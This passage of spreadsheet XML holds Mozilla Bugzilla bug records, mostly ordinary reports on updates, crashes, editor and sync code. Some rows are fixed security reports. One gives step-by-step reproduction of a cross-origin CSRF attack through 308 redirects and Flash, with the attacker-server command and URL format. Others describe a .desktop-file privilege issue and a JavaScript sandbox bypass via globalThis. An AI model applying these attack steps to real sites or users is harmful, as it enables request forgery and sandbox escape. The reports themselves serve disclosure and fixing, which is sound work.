          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1439" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1439" t="inlineStr">
        <is>
          <t>[sg:moderate] high/critical with mitigations;</t>
        </is>
      </c>
      <c r="Q1439" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1439" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1439" t="inlineStr">
        <is>
          <t>mozilla1.9.1b3</t>
        </is>
      </c>
      <c r="T1439" t="n">
        <v>1</v>
      </c>
      <c r="U1439" t="n">
        <v>0</v>
      </c>
      <c r="V1439" t="n">
        <v>76</v>
      </c>
      <c r="W1439" t="inlineStr">
        <is>
          <t>Created attachment 343527
perl script - chmod +x ; put on web server ; load ; open with firefox
.desktop files when loaded locally can load "about:config" and "about:plugins" which have chrome privileges.
the remote headers:
Content-type: text/html
Content-Disposition: attachment;filename=v1.desktop
the user interaction:
dialog asking "open with firefox"
somewhat related to Bug 369462</t>
        </is>
      </c>
      <c r="X1439" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1440">
      <c r="A1440" t="n">
        <v>534090</v>
      </c>
      <c r="B1440" t="inlineStr">
        <is>
          <t>2009-12-10 16:42:48 -0800</t>
        </is>
      </c>
      <c r="C1440" t="inlineStr">
        <is>
          <t>do not use background notification for major updates (was PMU 3.0-&gt;3.5 major update has been really poor)</t>
        </is>
      </c>
      <c r="D1440" t="inlineStr">
        <is>
          <t>2010-01-17 18:17:14 -0800</t>
        </is>
      </c>
      <c r="E1440" t="n">
        <v>1</v>
      </c>
      <c r="F1440" t="n">
        <v>1</v>
      </c>
      <c r="G1440" t="n">
        <v>3</v>
      </c>
      <c r="H1440" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1440" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J1440" t="inlineStr">
        <is>
          <t>Application Update</t>
        </is>
      </c>
      <c r="K1440" t="inlineStr">
        <is>
          <t>1.9.0 Branch</t>
        </is>
      </c>
      <c r="L1440" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1440" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1440" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1440" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1440" t="inlineStr">
        <is>
          <t>[verify on both 1.9.1.7 and 1.9.1.8]</t>
        </is>
      </c>
      <c r="Q1440" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1440" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S1440" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1440" t="n">
        <v>1</v>
      </c>
      <c r="U1440" t="n">
        <v>1</v>
      </c>
      <c r="V1440" t="n">
        <v>66</v>
      </c>
      <c r="W1440" t="inlineStr">
        <is>
          <t>Our prompted major update (PMU) isn't getting good uptake. The last one we had also didn't do as well as in the 2.0.0.x -&gt; 3.0.x days. We attributed this to the timing of that update, but in this case, we've only see about 1m people accept the major update, well below expectations and well below what has happened in every other major update (usually it's as low as 10%).
This bug is to track the work we're doing to figure out what's going on and to track any work we need to do to fix problems found.
I'm nominating this for blocking across branches because if this is a UI issue we caused, it needs to block our next maintenance releases (to fix 3.0.x -&gt; 3.5.x and 3.5.x -&gt; 3.6.x) and, if it's a more critical change, might need to block 3.6 (like, if there are string changes). That's a long shot (and unlikely) but I like to be safe rather than sorry.
(And I'll own this for now.)</t>
        </is>
      </c>
      <c r="X1440" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1441">
      <c r="A1441" t="n">
        <v>1506690</v>
      </c>
      <c r="B1441" t="inlineStr">
        <is>
          <t>2018-11-12 12:41:04 -0800</t>
        </is>
      </c>
      <c r="C1441" t="inlineStr">
        <is>
          <t>crash in java.lang.NullPointerException: Attempt to invoke virtual method 'boolean java.lang.String.equals(java.lang.Object)' on a null object reference at org.mozilla.gecko.CrashReporterActivity.getProfileName(CrashReporterActivity.java)</t>
        </is>
      </c>
      <c r="D1441" t="inlineStr">
        <is>
          <t>2020-12-21 10:38:46 -0800</t>
        </is>
      </c>
      <c r="E1441" t="n">
        <v>1</v>
      </c>
      <c r="F1441" t="n">
        <v>1</v>
      </c>
      <c r="G1441" t="n">
        <v>6</v>
      </c>
      <c r="H1441" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1441" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J1441" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1441" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1441" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1441" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N1441" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1441" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1441" t="inlineStr"/>
      <c r="Q1441" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1441" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1441" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1441" t="n">
        <v>1</v>
      </c>
      <c r="U1441" t="n">
        <v>0</v>
      </c>
      <c r="V1441" t="n">
        <v>7</v>
      </c>
      <c r="W1441" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #1483993 +++
The crash while attempting to enable startup profiling in bug 1506689 again leads to crash where the crash reporter itself crashes, too... and once again CrashReporterActivity.getProfileName() is to blame:
&gt; 11-12 21:01:55.021 31698-31698/? E/GeckoCrashHandler: &gt;&gt;&gt; REPORTING UNCAUGHT EXCEPTION FROM THREAD 1 ("main")
&gt;     java.lang.NullPointerException: Attempt to invoke virtual method 'boolean java.lang.String.equals(java.lang.Object)' on a null object reference
&gt;         at org.mozilla.gecko.CrashReporterActivity.getProfileName(CrashReporterActivity.java:343)
&gt;         at org.mozilla.gecko.CrashReporterActivity.onCreate(CrashReporterActivity.java:185)
&gt;         at android.app.Activity.performCreate(Activity.java:6259)
&gt;         at android.app.Instrumentation.callActivityOnCreate(Instrumentation.java:1130)
&gt;         at android.app.ActivityThread.performLaunchActivity(ActivityThread.java:2382)
&gt;         at android.app.ActivityThread.handleLaunchActivity(ActivityThread.java:2493)
&gt;         at android.app.ActivityThread.-wrap11(ActivityThread.java)
&gt;         at android.app.ActivityThread$H.handleMessage(ActivityThread.java:1357)
&gt;         at android.os.Handler.dispatchMessage(Handler.java:102)
&gt;         at android.os.Looper.loop(Looper.java:148)
&gt;         at android.app.ActivityThread.main(ActivityThread.java:5459)
&gt;         at java.lang.reflect.Method.invoke(Native Method)
&gt;         at com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:728)
&gt;         at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:618)</t>
        </is>
      </c>
      <c r="X1441" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1442">
      <c r="A1442" t="n">
        <v>1543804</v>
      </c>
      <c r="B1442" t="inlineStr">
        <is>
          <t>2019-04-11 12:38:37 -0700</t>
        </is>
      </c>
      <c r="C1442" t="inlineStr">
        <is>
          <t>Cross-origin requests can be made with NPAPI plugins by following 308 redirects</t>
        </is>
      </c>
      <c r="D1442" t="inlineStr">
        <is>
          <t>2024-05-30 09:58:17 -0700</t>
        </is>
      </c>
      <c r="E1442" t="n">
        <v>1</v>
      </c>
      <c r="F1442" t="n">
        <v>1</v>
      </c>
      <c r="G1442" t="n">
        <v>6</v>
      </c>
      <c r="H1442" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1442" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J1442" t="inlineStr">
        <is>
          <t>Plug-ins</t>
        </is>
      </c>
      <c r="K1442" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1442" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1442" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1442" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1442" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1442" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][post-critsmash-triage][adv-main68+][adv-esr60.8+]</t>
        </is>
      </c>
      <c r="Q1442" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1442" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1442" t="inlineStr">
        <is>
          <t>mozilla69</t>
        </is>
      </c>
      <c r="T1442" t="n">
        <v>1</v>
      </c>
      <c r="U1442" t="n">
        <v>0</v>
      </c>
      <c r="V1442" t="n">
        <v>38</v>
      </c>
      <c r="W1442" t="inlineStr">
        <is>
          <t>Created attachment 9057658
firefoxHttpRedirector.py
Cross-origin requests can be made with NPAPI plugins such as Flash which can allow an attacker to perform Cross-Site Request Forgery attacks using otherwise inaccessible HTTP headers such as Content-Type. This can be achieved by sending a request to an attacker controlled server (same-origin request) which will then respond with a 308 redirect with the “Location” header set to the target origin/vulnerable endpoint.
Once the browser receives this 308 redirect, the request is made to the cross-origin endpoint, and in Flash’s case, an immediate request for the target endpoints crossdomain.xml file is requested. However, since the browser has already responded to the 308 redirect, CORS has been violated.
Reproduction Steps:
A modular exploit has been attached including: csrf.html, csrf.as, and firefoxHttpRedirector.py. On a web server under your control, run the firefoxHttpRedirector.py script in the same folder as the csrf.html and compiled flash applet (csrf.swf) files. The command would look something like:
sudo python firefoxHttpRedirector.py --port 80 --target https://vulnerableapp123.com/api/endpoint
Then, once the web server has started, emulate a victim by constructing a CSRF request in the following format:
http://&lt;attack_server&gt;/csrf.html?attackerUrl=http://&lt;attack_server&gt;/&amp;md=POST&amp;jsonData={“foo”:”bar”}&amp;headers=Content-Type:application/json
Where the URL parameters are as follows:
attackerUrl - server where the firefoxHttpRedirector.py script is running
md - HTTP method/verb to use in the request to the target server (GET or POST)
jsonData - body data to be sent to the target server (the parameter is jsonData but any format would work)
headers - headers to include in the request, such as Content-Type
Once the appropriate URL has been constructed, navigate to that URL and note how Firefox
follows the redirection to the target server with the body and headers intact. 
I have setup an attack server which can be used as a PoC upon request. Currently I have it configured to be inaccessible however if there’s issues setting up the exploit, I can provide that URL. 
Expected behavior:
Firefox does not follow the 308 redirect or waits for a CORS evaluation before following the redirect.
Observed behavior:
Firefox follows the 308 redirect. 
Tested versions:
Firefox 66.0.3 x64 (Windows 7 6.1.7601)
Firefox 66.0.2 x64 (Windows 10 10.0.17134)
Firefox ESR 60.6.1esr x64 (macOS Sierra 10.12.6)
References:
https://bugzilla.mozilla.org/show_bug.cgi?id=1436241
https://blog.appsecco.com/exploiting-csrf-on-json-endpoints-with-flash-and-redirects-681d4ad6b31b
https://github.com/sp1d3r/swf_json_csrf</t>
        </is>
      </c>
      <c r="X1442" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1443">
      <c r="A1443" t="n">
        <v>47015</v>
      </c>
      <c r="B1443" t="inlineStr">
        <is>
          <t>2000-07-31 01:48:19 -0700</t>
        </is>
      </c>
      <c r="C1443" t="inlineStr">
        <is>
          <t>editor needs a way to ask layout what whitespace is significant</t>
        </is>
      </c>
      <c r="D1443" t="inlineStr">
        <is>
          <t>2001-09-12 00:43:03 -0700</t>
        </is>
      </c>
      <c r="E1443" t="n">
        <v>1</v>
      </c>
      <c r="F1443" t="n">
        <v>1</v>
      </c>
      <c r="G1443" t="n">
        <v>3</v>
      </c>
      <c r="H1443" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1443" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1443" t="inlineStr">
        <is>
          <t>DOM: Editor</t>
        </is>
      </c>
      <c r="K1443" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1443" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1443" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1443" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1443" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1443" t="inlineStr">
        <is>
          <t>[whitespace][nsbeta3-][rtm-]</t>
        </is>
      </c>
      <c r="Q1443" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1443" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S1443" t="inlineStr">
        <is>
          <t>mozilla0.9.1</t>
        </is>
      </c>
      <c r="T1443" t="n">
        <v>1</v>
      </c>
      <c r="U1443" t="n">
        <v>0</v>
      </c>
      <c r="V1443" t="n">
        <v>29</v>
      </c>
      <c r="W1443" t="inlineStr">
        <is>
          <t>The rules for when whitespace in html actually renders and when it doesn't are 
odd, and their enforcement in layout has changed over time.  Since the editor 
doesnt have a way to ask layout abut this, bugs have appeared in the editor as 
layout changes it's whitespace policy.
This bug is a catchall for this issue: I'm duping several bugs to it.</t>
        </is>
      </c>
      <c r="X1443" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1444">
      <c r="A1444" t="n">
        <v>925100</v>
      </c>
      <c r="B1444" t="inlineStr">
        <is>
          <t>2013-10-09 13:51:39 -0700</t>
        </is>
      </c>
      <c r="C1444" t="inlineStr">
        <is>
          <t>Integer truncation leads to runaway memset in NSS certificate parsing</t>
        </is>
      </c>
      <c r="D1444" t="inlineStr">
        <is>
          <t>2015-02-25 20:16:36 -0800</t>
        </is>
      </c>
      <c r="E1444" t="n">
        <v>1</v>
      </c>
      <c r="F1444" t="n">
        <v>1</v>
      </c>
      <c r="G1444" t="n">
        <v>3</v>
      </c>
      <c r="H1444" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1444" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J1444" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K1444" t="inlineStr">
        <is>
          <t>trunk</t>
        </is>
      </c>
      <c r="L1444" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1444" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1444" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1444" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1444" t="inlineStr"/>
      <c r="Q1444" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1444" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S1444" t="inlineStr">
        <is>
          <t>3.15.3</t>
        </is>
      </c>
      <c r="T1444" t="n">
        <v>1</v>
      </c>
      <c r="U1444" t="n">
        <v>0</v>
      </c>
      <c r="V1444" t="n">
        <v>26</v>
      </c>
      <c r="W1444" t="inlineStr">
        <is>
          <t>Created attachment 815080
Patch by Adam Langley
Tavis Ormandy of Google reported this bug. The Chromium issue is
https://code.google.com/p/chromium/issues/detail?id=302790.
Adam wrote in the Chromium issue:
  Tavis found that it's possible to trigger a runaway memset in
  NSS when parsing a certificate. sec_asn1d_zalloc allocates
  length &amp; 0xffffffff but then memsets with length as a size_t.
  This issue also affects Firefox.
  It's unclear what the severity of this issue is. Tavis doesn't
  think it's good, but it appears that it would always involve
  memsetting at least 4GB of random memory, so it may be just a
  crash.
I attached Adam's patch.</t>
        </is>
      </c>
      <c r="X1444" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1445">
      <c r="A1445" t="n">
        <v>1507578</v>
      </c>
      <c r="B1445" t="inlineStr">
        <is>
          <t>2018-11-15 11:17:25 -0800</t>
        </is>
      </c>
      <c r="C1445" t="inlineStr">
        <is>
          <t>Reopen landed review requests when patches get backed out</t>
        </is>
      </c>
      <c r="D1445" t="inlineStr">
        <is>
          <t>2019-07-01 05:50:44 -0700</t>
        </is>
      </c>
      <c r="E1445" t="n">
        <v>1</v>
      </c>
      <c r="F1445" t="n">
        <v>1</v>
      </c>
      <c r="G1445" t="n">
        <v>7</v>
      </c>
      <c r="H1445" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I1445" t="inlineStr">
        <is>
          <t>Conduit</t>
        </is>
      </c>
      <c r="J1445" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1445" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1445" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1445" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1445" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1445" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1445" t="inlineStr"/>
      <c r="Q1445" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1445" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1445" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1445" t="n">
        <v>1</v>
      </c>
      <c r="U1445" t="n">
        <v>0</v>
      </c>
      <c r="V1445" t="n">
        <v>8</v>
      </c>
      <c r="W1445" t="inlineStr">
        <is>
          <t>Differential revisions are closed in Phabricator when they "land" in a tracked repo.
Lando refuses to land closed Differential revisions.
In order to re-land a backed out changeset using Lando, one needs to first re-open the revision in Phabricator. This is somewhat tolerable for single revisions. But if you have a series of say 10 revisions, manually iterating through all of them to re-open is overly tedious and wastes my time.
I can think of a few mitigations for this:
1. Allow Lando to land closed revisions. (We'll presumably need this anyway to handle uplifts.)
2. Automatically reopen a Phabricator revision when it is backed out. (Pulsebot could potentially do this.)</t>
        </is>
      </c>
      <c r="X1445" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1446">
      <c r="A1446" t="n">
        <v>1552632</v>
      </c>
      <c r="B1446" t="inlineStr">
        <is>
          <t>2019-05-17 20:53:13 -0700</t>
        </is>
      </c>
      <c r="C1446" t="inlineStr">
        <is>
          <t>globalThis does not appear in property names of window until specifically referenced</t>
        </is>
      </c>
      <c r="D1446" t="inlineStr">
        <is>
          <t>2020-06-05 00:04:28 -0700</t>
        </is>
      </c>
      <c r="E1446" t="n">
        <v>1</v>
      </c>
      <c r="F1446" t="n">
        <v>1</v>
      </c>
      <c r="G1446" t="n">
        <v>3</v>
      </c>
      <c r="H1446" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1446" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1446" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1446" t="inlineStr">
        <is>
          <t>66 Branch</t>
        </is>
      </c>
      <c r="L1446" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1446" t="inlineStr">
        <is>
          <t>Windows</t>
        </is>
      </c>
      <c r="N1446" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1446" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1446" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main68+]</t>
        </is>
      </c>
      <c r="Q1446" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1446" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1446" t="inlineStr">
        <is>
          <t>mozilla69</t>
        </is>
      </c>
      <c r="T1446" t="n">
        <v>1</v>
      </c>
      <c r="U1446" t="n">
        <v>0</v>
      </c>
      <c r="V1446" t="n">
        <v>10</v>
      </c>
      <c r="W1446" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Steps to reproduce:
0. Open or refresh a page that does not reference globalThis in its scripts
1. Open developer console and enter the following:
2. &gt;&gt; Object.getOwnPropertyNames(window)
3. &gt;&gt; Object.getOwnPropertyNames(window).indexOf('globalThis')
4. &gt;&gt; window.globalThis // alternatively, simply reference globalThis
5. &gt;&gt; Object.getOwnPropertyNames(window)
6. &gt;&gt; Object.getOwnPropertyNames(window).indexOf('globalThis')
Actual results:
2. &lt;-  Array(909) [ "undefined", "InternalError", "EvalError", "RangeError", "ReferenceError", "SyntaxError", "TypeError", "URIError", "ArrayBuffer", "Int8Array", … ]
3. &lt;-  -1
4. &lt;-  Window https://bugzilla.mozilla.org/enter_bug.cgi#h=bugForm%7CFirefox
5. &lt;-  Array(910) [ "undefined", "InternalError", "EvalError", "RangeError", "ReferenceError", "SyntaxError", "TypeError", "URIError", "ArrayBuffer", "Int8Array", … ]
6. &lt;-  909
Expected results:
The result of lines 2 and 3 should have matched lines 5 and 6. The array of returned property names should not have grown when globalThis was first referenced, because it should already have been present. It appears that the globalThis item is added to the very end of the property names as soon as it is referenced, but is not present before then.
This is marked as a security bug because it can potentially be used to bypass JavaScript sandboxes (such as Salesforce's Locker Service) where being able to control access to the global scope is important.
A script that uses Object.getOwnPropertyNames(window) to create a proxy object (which is then frozen) for use in a with() block should be able to prevent untrusted script executing within that block (if it's also within an immediately-invoked anonymous function and in strict mode) from accessing the global scope. However, if that sandboxing script doesn't explicitly reference globalThis beforehand, or explicitly attach it to its proxy object, then the untrusted script will be able to access the global scope anyhow.</t>
        </is>
      </c>
      <c r="X1446" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1447">
      <c r="A1447" t="n">
        <v>379507</v>
      </c>
      <c r="B1447" t="inlineStr">
        <is>
          <t>2007-05-02 13:08:22 -0700</t>
        </is>
      </c>
      <c r="C1447" t="inlineStr">
        <is>
          <t>Bugzilla::Testopia::TestPlan-&gt;add_plan_type() uses an incorrect SQL query</t>
        </is>
      </c>
      <c r="D1447" t="inlineStr">
        <is>
          <t>2007-05-02 14:29:39 -0700</t>
        </is>
      </c>
      <c r="E1447" t="n">
        <v>1</v>
      </c>
      <c r="F1447" t="n">
        <v>1</v>
      </c>
      <c r="G1447" t="n">
        <v>4</v>
      </c>
      <c r="H1447" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1447" t="inlineStr">
        <is>
          <t>Testopia</t>
        </is>
      </c>
      <c r="J1447" t="inlineStr">
        <is>
          <t>Test Plans</t>
        </is>
      </c>
      <c r="K1447" t="inlineStr">
        <is>
          <t>1.2</t>
        </is>
      </c>
      <c r="L1447" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1447" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1447" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1447" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1447" t="inlineStr"/>
      <c r="Q1447" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1447" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S1447" t="inlineStr">
        <is>
          <t>1.3</t>
        </is>
      </c>
      <c r="T1447" t="n">
        <v>1</v>
      </c>
      <c r="U1447" t="n">
        <v>0</v>
      </c>
      <c r="V1447" t="n">
        <v>2</v>
      </c>
      <c r="W1447" t="inlineStr">
        <is>
          <t>Created attachment 263513
patch, v1
Do not mention columns being automatically incremented by the DB. PostgreSQL sees 'undef' as NULL, not as "I let you decided what the ID should be".</t>
        </is>
      </c>
      <c r="X1447" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1448">
      <c r="A1448" t="n">
        <v>1408108</v>
      </c>
      <c r="B1448" t="inlineStr">
        <is>
          <t>2017-10-12 11:19:43 -0700</t>
        </is>
      </c>
      <c r="C1448" t="inlineStr">
        <is>
          <t>Rename "Sync ID" to "record ID" in the bookmarks engine and `PlacesSyncUtils`</t>
        </is>
      </c>
      <c r="D1448" t="inlineStr">
        <is>
          <t>2017-11-07 03:01:07 -0800</t>
        </is>
      </c>
      <c r="E1448" t="n">
        <v>1</v>
      </c>
      <c r="F1448" t="n">
        <v>1</v>
      </c>
      <c r="G1448" t="n">
        <v>2</v>
      </c>
      <c r="H1448" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1448" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J1448" t="inlineStr">
        <is>
          <t>Sync</t>
        </is>
      </c>
      <c r="K1448" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1448" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1448" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1448" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1448" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1448" t="inlineStr"/>
      <c r="Q1448" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1448" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1448" t="inlineStr">
        <is>
          <t>Firefox 58</t>
        </is>
      </c>
      <c r="T1448" t="n">
        <v>1</v>
      </c>
      <c r="U1448" t="n">
        <v>0</v>
      </c>
      <c r="V1448" t="n">
        <v>25</v>
      </c>
      <c r="W1448" t="inlineStr">
        <is>
          <t>A synced bookmark's "sync ID" is just the Places GUID, except for the roots, where it's either the root name without trailing underscores for syncable roots, or "places" for "root________".
"Sync ID" in the rest of Sync means something different, though: it's a random ID stored in meta/global, for every engine and for the client. On every sync, we check if it's different than what we have locally, and, if so, discard all local state and start over as if it's a first sync.
Let's clean this up and rename the bookmark sync ID to something like "record ID" or "Sync record ID".</t>
        </is>
      </c>
      <c r="X1448" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1449">
      <c r="A1449" t="n">
        <v>482989</v>
      </c>
      <c r="B1449" t="inlineStr">
        <is>
          <t>2009-03-12 10:27:39 -0700</t>
        </is>
      </c>
      <c r="C1449" t="inlineStr">
        <is>
          <t>Website: Use compound modifiers properly on homepage's Personas description</t>
        </is>
      </c>
      <c r="D1449" t="inlineStr">
        <is>
          <t>2016-07-29 13:12:35 -0700</t>
        </is>
      </c>
      <c r="E1449" t="n">
        <v>1</v>
      </c>
      <c r="F1449" t="n">
        <v>1</v>
      </c>
      <c r="G1449" t="n">
        <v>6</v>
      </c>
      <c r="H1449" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1449" t="inlineStr">
        <is>
          <t>Mozilla Labs Graveyard</t>
        </is>
      </c>
      <c r="J1449" t="inlineStr">
        <is>
          <t>Personas Plus</t>
        </is>
      </c>
      <c r="K1449" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1449" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1449" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1449" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1449" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1449" t="inlineStr"/>
      <c r="Q1449" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1449" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1449" t="inlineStr">
        <is>
          <t>1.0</t>
        </is>
      </c>
      <c r="T1449" t="n">
        <v>1</v>
      </c>
      <c r="U1449" t="n">
        <v>0</v>
      </c>
      <c r="V1449" t="n">
        <v>6</v>
      </c>
      <c r="W1449" t="inlineStr">
        <is>
          <t>On the homepage, "Personas are lightweight, easy to install and easy to change “skins” for your Firefox web browser." should read:
'Personas are lightweight, easy-to-install and easy-to-change "skins" for your Firefox web browser."
(Those two phrases are compound modifiers of "skins.")</t>
        </is>
      </c>
      <c r="X1449" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1450">
      <c r="A1450" t="n">
        <v>1599625</v>
      </c>
      <c r="B1450" t="inlineStr">
        <is>
          <t>2019-11-26 14:33:14 -0800</t>
        </is>
      </c>
      <c r="C1450" t="inlineStr">
        <is>
          <t>bitbar: add taskcluster-proxy to the image</t>
        </is>
      </c>
      <c r="D1450" t="inlineStr">
        <is>
          <t>2020-01-23 15:01:31 -0800</t>
        </is>
      </c>
      <c r="E1450" t="n">
        <v>1</v>
      </c>
      <c r="F1450" t="n">
        <v>1</v>
      </c>
      <c r="G1450" t="n">
        <v>5</v>
      </c>
      <c r="H1450" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1450" t="inlineStr">
        <is>
          <t>Infrastructure &amp; Operations</t>
        </is>
      </c>
      <c r="J1450" t="inlineStr">
        <is>
          <t>RelOps: General</t>
        </is>
      </c>
      <c r="K1450" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1450" t="inlineStr">
        <is>
